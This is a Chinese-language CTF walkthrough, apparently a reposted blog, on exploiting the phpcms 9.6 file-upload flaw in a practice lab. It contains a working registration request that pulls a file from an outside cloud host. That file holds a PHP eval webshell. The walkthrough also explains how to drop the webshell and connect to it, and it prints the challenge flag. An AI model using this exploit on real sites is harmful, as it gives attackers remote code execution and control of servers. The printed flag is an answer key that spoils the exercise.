1. 程式人生 > >CTF/CTF練習平臺-phpcmsV9【phpcms 9 6 漏洞利用】

CTF/CTF練習平臺-phpcmsV9【phpcms 9 6 漏洞利用】

               

原題內容:

一個靶機而已,別搞破壞。

多謝各位大俠手下留情,flag在根目錄裡txt檔案裡
http://120.24.86.145:8001/


首先開啟題目連結,可以觀察到版本資訊


首先想到的是,這很明顯是個模板網站,百度走起,get幾條有用資訊


獲得該模板基本目錄資訊

其次百度很明顯可以看到phpcms漏洞資訊,版本9.6的,這是很明顯的資訊了,先試試,不行再走普通流程(看到題目的tips說手下留情,就覺得應該是個很簡單的辦法,不是各種暴力手段)


這裡參考了兩個部落格:

PHPcms9.6.0 最新版任意檔案上傳漏洞

Phpcms_V9任意檔案上傳漏洞的利用以及小小的分析


怎麼說呢,這兩個部落格大概說懂了漏洞如何利用,但是實際操作中還是有很多問題的

下面列出自己的幾個操作失誤點,供大家參考:

1.第一次上傳檔案,我用了自己騰訊雲的伺服器裡中的檔案,一直是報錯無content欄位(分析一下應該是不具有騰訊雲讀許可權,上傳插入失敗),改成千牛的連線就可以了

2.hackbar還是很好用的,值得推薦


接下來就上圖上程式碼表示怎麼做吧



程式碼:

http://120.24.86.145:8001/index.php?m=member&c=index&a=register&siteid=1

siteid=1&modelid=11&username=qwer12345&password=123456&[email protected]&info[content]=<img src=http://ovgb1c2jq.bkt.clouddn.com/1.txt#.jpg>&dosubmit=1&protocol=

至於下面post的引數怎麼來的,不用多說了,使用者註冊介面bp來的(漏洞原理見上方參考資料)

src的上傳資料來源我的網盤,檔案1.txt中含有一句話木馬

<?php @eval
($_POST['GETF']);?>

注意,第一次是測試txt是否可以傳入,從報錯中明顯可以看到該txt檔案已經傳入

第二次在上傳同時用?將txt檔案修改成php格式檔案傳入

注意,使用者名稱,郵箱都要改變


報錯資訊中就是木馬上傳到的地址


木馬上傳成功,剩下就是用菜刀連線了,注入引數是GETF


順利get flag

吐槽一下(做題的注意素質,看了答案別刪了,害得我找了半天,最後我還是去別人wp找的答案)


flag{admin_a23-ae2132_key}

如果刪了自取答案


注:發現一個大佬寫的指令碼,有興趣的可以去看看

phpcms9-6-0 一鍵getshell工具



           

再分享一下我老師大神的人工智慧教程吧。零基礎!通俗易懂!風趣幽默!還帶黃段子!希望你也加入到我們人工智慧的隊伍中來!https://blog.csdn.net/jiangjunshow